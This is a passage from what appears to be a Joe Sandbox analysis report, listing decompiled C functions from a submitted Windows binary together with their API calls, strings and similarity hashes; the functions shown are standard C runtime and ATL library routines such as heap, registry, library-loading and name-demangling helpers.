                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$AllocSize
                      • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                      • API String ID: 3906553864-3244948836
                      • Opcode ID: 0440308b9a954364113bb38e1d2aca30a94485ae40f9025c040543848438277a
                      • Instruction ID: 26dfc8f95bdfac700507ab3ee13cc058f74945492a6aa5eade2d7d2805b20d3f
                      • Opcode Fuzzy Hash: 0440308b9a954364113bb38e1d2aca30a94485ae40f9025c040543848438277a
                      • Instruction Fuzzy Hash: 2831A0B0D4420CFBDB10EFA9D846BAE77B8AB85304F108855F415AF281D7B59E80CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 57%
                      			E00952030(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr* _v8;
                      				intOrPtr* _v12;
                      				intOrPtr* _v16;
                      				intOrPtr* _v20;
                      				char _v24;
                      				void* _t33;
                      				intOrPtr _t37;
                      				void* _t40;
                      				void* _t41;
                      				void* _t46;
                      				void* _t64;
                      				void* _t68;
                      				void* _t69;
                      
                      				_t64 = __edi;
                      				_t47 = __ebx;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = E00943B30(__ebx, 0xb33710, __eflags);
                      				_t72 = _v8;
                      				if(_v8 == 0) {
                      					_t46 = L00994930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf2f, 0, L"%ls", L"pThis != 0");
                      					_t69 = _t69 + 0x18;
                      					if(_t46 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v8 != 0) {
                      					 *((intOrPtr*)(_v8 + 4)) = _a4;
                      					_t66 = _t69;
                      					_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))();
                      					__eflags = _t69 - _t69;
                      					E0094C490(_v8 + 8, __eflags, E009D1520(_t33, __eflags), _v8);
                      					_v12 = E0094C4D0(_v8 + 8, __eflags);
                      					_t37 = E0094C3E0(_t69, _a4, 4, _v12);
                      					_t69 = _t69 + 0xc;
                      					_v16 = _t37;
                      					__eflags = _v16 - E00952030;
                      					if(__eflags != 0) {
                      						_push("Subclassing through a hook discarded.\n");
                      						_push(0);
                      						_push(E0094F1E0(0xb33748));
                      						_push(E009423B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf3e));
                      						E009423E0(_t47, _t64, _t66, __eflags);
                      						_t69 = _t69 + 0x10;
                      					}
                      					_t40 = _v12(_a4, _a8, _a12, _a16);
                      					__eflags = _t69 - _t69;
                      					_t41 = E009D1520(_t40, __eflags);
                      				} else {
                      					_t41 = 0;
                      				}
                      				return E009D1520(_t41, _t68 - _t69 + 0x14);
                      			}

                      APIs
                      • ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 009520D8
                      • _Smanip.LIBCPMTD ref: 0095210B
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00952103
                      • pThis != 0, xrefs: 0095205E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0095206F
                      • %ls, xrefs: 00952063
                      • Subclassing through a hook discarded., xrefs: 009520EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CompareExchangeInlineInterlockedPointerSmanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$Subclassing through a hook discarded.$pThis != 0
                      • API String ID: 2445389785-534117427
                      • Opcode ID: 419172df3f8a17134e0be11cb423394f763dfd1b74305a28a729308d6d5bb22b
                      • Instruction ID: e6068c050bfd5d20ec7e7a9db860da6c41587950dcfb983a15f89a87c9c60fbf
                      • Opcode Fuzzy Hash: 419172df3f8a17134e0be11cb423394f763dfd1b74305a28a729308d6d5bb22b
                      • Instruction Fuzzy Hash: 843161B1E41208BFCB44EFA8C952FAEB7B4AF88705F108559FA05A7281D6745F40CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00944840(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
                      				void** _v8;
                      				int _v12;
                      				int _v16;
                      				void* _t22;
                      				long _t26;
                      				void* _t27;
                      				void* _t29;
                      				void* _t30;
                      				void* _t31;
                      				void* _t41;
                      				void* _t42;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t44 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t31 = L00994930(_t44, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1877, 0, "%ls", L"m_hKey != 0");
                      						_t42 = _t42 + 0x18;
                      						if(_t31 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				L5:
                      				L5:
                      				if(_a8 == 0) {
                      					_v16 = 0;
                      				} else {
                      					_v16 = 1;
                      				}
                      				_v12 = _v16;
                      				_t48 = _v12;
                      				if(_v12 == 0) {
                      					_t30 = L00994930(_t48, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1878, 0, "%ls", L"__atl_condVal");
                      					_t42 = _t42 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					goto L13;
                      				}
                      				_t27 = 0xd;
                      				L19:
                      				return E009D1520(_t27, _t41 - _t42 + 0xc);
                      				L13:
                      				__eflags = 0;
                      				if(0 != 0) {
                      					goto L5;
                      				}
                      				__eflags = _a12 - 1;
                      				if(_a12 != 1) {
                      					__eflags = _a12 - 2;
                      					if(__eflags != 0) {
                      						_t29 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1879, 0, "%ls", L"(dwType == ( 1ul )) || (dwType == ( 2ul ))");
                      						_t42 = _t42 + 0x18;
                      						__eflags = _t29 - 1;
                      						if(_t29 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				}
                      				_t22 = E00992E00(_a8);
                      				_t42 = _t42 + 4;
                      				_t26 = RegSetValueExA( *_v8, _a4, 0, _a12, _a8, _t22 + 1);
                      				__eflags = _t42 - _t42;
                      				_t27 = E009D1520(_t26, __eflags);
                      				goto L19;
                      			}

                      APIs
                      • _strlen.LIBCMT ref: 00944920
                      • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,00000000,-00000001), ref: 00944942
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$(dwType == ( 1ul )) || (dwType == ( 2ul ))$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-2957920586
                      • Opcode ID: 9b4260fb354b93a43c2bde936a427d8bab0d70f0fb65da220f3b64620c081e3c
                      • Instruction ID: 286dfcd59674c16488d759d7dc94cb7a1bbf0f750bcd215694210a3d8cb16703
                      • Opcode Fuzzy Hash: 9b4260fb354b93a43c2bde936a427d8bab0d70f0fb65da220f3b64620c081e3c
                      • Instruction Fuzzy Hash: 2031EA71E84308BBDF24DF98DC47FAE7368AB90B08F248555F6046A3C1E6B59B50CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009AD8A0(signed int __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr _a16) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				intOrPtr _v32;
                      				void* _t35;
                      				void* _t38;
                      				signed int _t55;
                      				void* _t75;
                      				void* _t76;
                      				void* _t77;
                      
                      				_t74 = __edi;
                      				_t55 = __ecx;
                      				_t35 = E00994020( &_a4);
                      				_t76 = _t75 + 4;
                      				_v16 = _t35 + 1;
                      				if(_v16 <= (_t55 | 0xffffffff) - _a12) {
                      					_v12 = _a12 + _v16 + 1;
                      					_t38 = L009992C0(_a12 + _v16 + 1, __edi, _v12, 1, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x98);
                      					_t77 = _t76 + 0x14;
                      					L0095BF60( &_v8, _t38);
                      					if(_a12 > 0) {
                      						_v20 = E0095C0C0( &_v8);
                      						E00994A20(E009AE240( &_v20,  &_v12,  &_a8,  &_a12), _t52, L"traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x9c, 0);
                      						_t77 = _t77 + 0x28;
                      					}
                      					_v24 = _v12 - _a12;
                      					_v28 = E0095C0C0( &_v8) + _a12;
                      					E00994A20(E009AE270( &_v28,  &_v24,  &_a4,  &_v16), _t43, L"traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0xa3, 0);
                      					_v32 = E009AE8C0(_a16, _t74, E0099C129( &_v8));
                      					E0095BFA0( &_v8);
                      					return _v32;
                      				}
                      				return 0xc;
                      			}

                      APIs
                        • Part of subcall function 00994020: _strlen.LIBCMT ref: 0099402B
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD93F
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD98D
                      Strings
                      • traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 009AD921
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AD917, 009AD965
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AD8E1
                      • traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 009AD96F
                      • copy_and_add_argument_to_buffer, xrefs: 009AD91C, 009AD96A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __invoke_watson_if_error$_strlen
                      • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                      • API String ID: 4131775925-1477255430
                      • Opcode ID: 4d8aa4fa39f3280e4e52a248fccbc90c48155affed8d967a18ffa9f0712146f1
                      • Instruction ID: 9755985ac9dcbddab0a419ed50c417154bb9c5c049c66f3c23dc1f9bee7f28a4
                      • Opcode Fuzzy Hash: 4d8aa4fa39f3280e4e52a248fccbc90c48155affed8d967a18ffa9f0712146f1
                      • Instruction Fuzzy Hash: A73163B6D40209BBCF01EFA4DC82FEF7738AB90309F004559B91166282E774AB14CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 30%
                      			E009421A0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v268;
                      				char _v272;
                      				signed int _t14;
                      				signed int _t15;
                      				void* _t23;
                      				void* _t26;
                      				void* _t34;
                      				void* _t39;
                      				void* _t41;
                      				void* _t42;
                      				void* _t43;
                      				signed int _t44;
                      				void* _t45;
                      				void* _t46;
                      
                      				_t43 = __esi;
                      				_t34 = __edx;
                      				_t26 = __ebx;
                      				_t41 =  &_v272;
                      				memset(_t41, 0xcccccccc, 0x43 << 2);
                      				_t46 = _t45 + 0xc;
                      				_t42 = _t41 + 0x43;
                      				_t14 =  *0xa0600c; // 0x5d529087
                      				_t15 = _t14 ^ _t44;
                      				_v8 = _t15;
                      				if(_a4 != 0) {
                      					__eflags =  *0xb33670 - 0x20;
                      					if( *0xb33670 < 0x20) {
                      						 *((intOrPtr*)(0xb315f0 +  *0xb33670 * 0x104)) = _a8;
                      						E0095AF80(_t42,  &_v268, 0, 0x100);
                      						E00941490(__eflags,  &_v268, 0x7f, L"%hs", _a4);
                      						_t34 = 0xb315f4 +  *0xb33670 * 0x104;
                      						E00992600(_t34, 0x7f,  &_v268);
                      						_t46 = _t46 + 0x28;
                      						_t15 =  *0xb33670 + 1;
                      						__eflags = _t15;
                      						 *0xb33670 = _t15;
                      					} else {
                      						_t15 = 0;
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t15 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltrace.h", 0x151, 0, "%ls", L"false && \"Too many categories defined\"");
                      							_t46 = _t46 + 0x18;
                      							__eflags = 0 - 1;
                      							if(0 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      				}
                      				E009D14C0(_t44, 0x9422a8);
                      				_t23 = _t15;
                      				_t39 = _t34;
                      				return E009D1520(E00957280(_t23, _t26, _v8 ^ _t44, _t39, _t42, _t43), _t44 - _t46 + 0x10c);
                      			}



















                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00942282
                      Strings
                      • %ls, xrefs: 009421E3
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h, xrefs: 009421EF
                      • atlTraceGeneral, xrefs: 0094225C
                      • %hs, xrefs: 00942233
                      • false && "Too many categories defined", xrefs: 009421DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %hs$%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h$atlTraceGeneral$false && "Too many categories defined"
                      • API String ID: 930174750-274957755
                      • Opcode ID: 2403d3c4f7fe0f73469957f26093c24ab9a9c6d00d4a9751bb5fa516ab2357ad
                      • Instruction ID: 21106b7329bca6bd5730b24deb321023062d1f19263dcdc1f2cd6192742f3c4a
                      • Opcode Fuzzy Hash: 2403d3c4f7fe0f73469957f26093c24ab9a9c6d00d4a9751bb5fa516ab2357ad
                      • Instruction Fuzzy Hash: BB214C76A08208BFDB14DB24EC43FB97368F7D4708F504215FA055B2D2EBF4A6848B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009A3670(void* __ecx, WCHAR* _a4) {
                      				struct HINSTANCE__* _v8;
                      
                      				_v8 = LoadLibraryExW(_a4, 0, 0x800);
                      				if(_v8 == 0) {
                      					if(GetLastError() != 0x57 || E009A2BC0(_a4, L"api-ms-", 7) == 0 || E009A2BC0(_a4, L"ext-ms-", 7) == 0) {
                      						return 0;
                      					} else {
                      						return LoadLibraryExW(_a4, 0, 0);
                      					}
                      				}
                      				return _v8;
                      			}





                      APIs
                      • LoadLibraryExW.KERNEL32(009A3569,00000000,00000800,?,?,009A3569,00000000), ref: 009A3681
                      • GetLastError.KERNEL32(?,?,009A3569), ref: 009A3695
                      • _wcsncmp.LIBCMTD ref: 009A36AB
                      • _wcsncmp.LIBCMTD ref: 009A36C2
                      • LoadLibraryExW.KERNEL32(009A3569,00000000,00000000,?,?,?,?,009A3569), ref: 009A36D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: LibraryLoad_wcsncmp$ErrorLast
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 180994465-537541572
                      • Opcode ID: c817df3d2a0f8530bbcb99a5427e6a5984edece15b42e3b5d32d09103d1bd4ed
                      • Instruction ID: 29ed31532d0a043f111fad0ebcc28c07876b4d51645a902e0277728f9dbbc97e
                      • Opcode Fuzzy Hash: c817df3d2a0f8530bbcb99a5427e6a5984edece15b42e3b5d32d09103d1bd4ed
                      • Instruction Fuzzy Hash: 2601A471B44208F7DB109FA2DD0BF5A3768AB46784F208410F9089A281EE75DF4097E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E009569E3(void* __edi) {
                      				intOrPtr _t2;
                      				void* _t6;
                      				void* _t12;
                      				void* _t15;
                      				void _t16;
                      				void* _t17;
                      				intOrPtr _t19;
                      				void* _t20;
                      
                      				_t15 = __edi;
                      				_t2 =  *0xb30208; // 0x0
                      				if(_t2 != 0) {
                      					L3:
                      					if(_t2 != 1) {
                      						__imp__InterlockedPopEntrySList(_t2);
                      						_t19 = _t2;
                      						if(_t19 == 0) {
                      							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
                      							if(_t20 != 0) {
                      								__imp__InterlockedPopEntrySList( *0xb30208, _t15);
                      								_t16 =  *_t20;
                      								if(_t16 == 0) {
                      									_t1 = _t20 + 0xff0; // 0xff0
                      									_t17 = _t1;
                      									do {
                      										__imp__InterlockedPushEntrySList( *0xb30208, _t20);
                      										_t20 = _t20 + 0x10;
                      									} while (_t20 < _t17);
                      									_t6 = _t20;
                      									L15:
                      									return _t6;
                      								}
                      								VirtualFree(_t20, 0, 0x8000);
                      								_t6 = _t16;
                      								goto L15;
                      							}
                      							L9:
                      							RaiseException(0xc0000017, 0, 0, 0);
                      							return 0;
                      						}
                      						E0095AF80(_t15, _t19, 0, 0xd);
                      						return _t19;
                      					}
                      					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
                      					if(_t12 == 0) {
                      						goto L9;
                      					}
                      					return _t12;
                      				}
                      				if(E00956AF9() == 0) {
                      					goto L9;
                      				}
                      				_t2 =  *0xb30208; // 0x0
                      				goto L3;
                      			}












                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A07
                      • HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A0E
                        • Part of subcall function 00956AF9: IsProcessorFeaturePresent.KERNEL32(0000000C,009569F5,00000000,?,00956BAD,?,?,00944CBB), ref: 00956AFB
                      • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A1E
                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00956BAD,?,?,00944CBB), ref: 00956A45
                      • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A59
                      • InterlockedPopEntrySList.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A6C
                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00956BAD,?,?,00944CBB), ref: 00956A7F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                      • String ID:
                      • API String ID: 2460949444-0
                      • Opcode ID: 1333d076ef96dd24b72f66827deff395cb3becf2139b2d0b75b1e656f717d598
                      • Instruction ID: 801708e8e2680acea2b0a51f939822e0bf60fb9f8e1dc3ce573d37d21b9a07f3
                      • Opcode Fuzzy Hash: 1333d076ef96dd24b72f66827deff395cb3becf2139b2d0b75b1e656f717d598
                      • Instruction Fuzzy Hash: 1A110475689611BBEB21DF6AAC48F2B771CAF44782F908422FD11F7151DB20DC889BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0095FD40(intOrPtr __ecx, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      
                      				_v8 = __ecx;
                      				if(E0096A6C0(_v8) != 0) {
                      					if(E0096A560(_v8) == 0) {
                      						if(E0096A560(_a4) == 0) {
                      							E0095E8C0(_v8,  *_a4);
                      						} else {
                      							_v12 = E0096AB70(_a4);
                      							if(_v12 != 0) {
                      								L0095FF10(_v8, _v12);
                      							}
                      						}
                      					} else {
                      						if(E0096A560(_a4) == 0) {
                      							E0095F820(_v8, _a4);
                      						} else {
                      							E0095F920(_v8, E0096AB70(_a4));
                      						}
                      					}
                      				}
                      				return _v8;
                      			}






                      APIs
                      • DName::isValid.LIBCMTD ref: 0095FD4C
                      • DName::isEmpty.LIBCMTD ref: 0095FD58
                      • DName::isEmpty.LIBCMTD ref: 0095FD64
                      • DName::operator=.LIBVCRUNTIMED ref: 0095FD79
                        • Part of subcall function 0095F920: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F957
                      • Mailbox.LIBCMTD ref: 0095FD87
                      • DName::isEmpty.LIBCMTD ref: 0095FD91
                      • DName::operator+=.LIBCMTD ref: 0095FDB4
                        • Part of subcall function 0095FF10: DName::isValid.LIBCMTD ref: 0095FF1A
                        • Part of subcall function 0095FF10: DName::isEmpty.LIBCMTD ref: 0095FF26
                        • Part of subcall function 0095FF10: DName::operator=.LIBVCRUNTIMED ref: 0095FF42
                      • DName::append.LIBCMTD ref: 0095FDC4
                        • Part of subcall function 0095E8C0: pairNode::pairNode.LIBCMTD ref: 0095E8F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
                      • String ID:
                      • API String ID: 1694665504-0
                      • Opcode ID: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
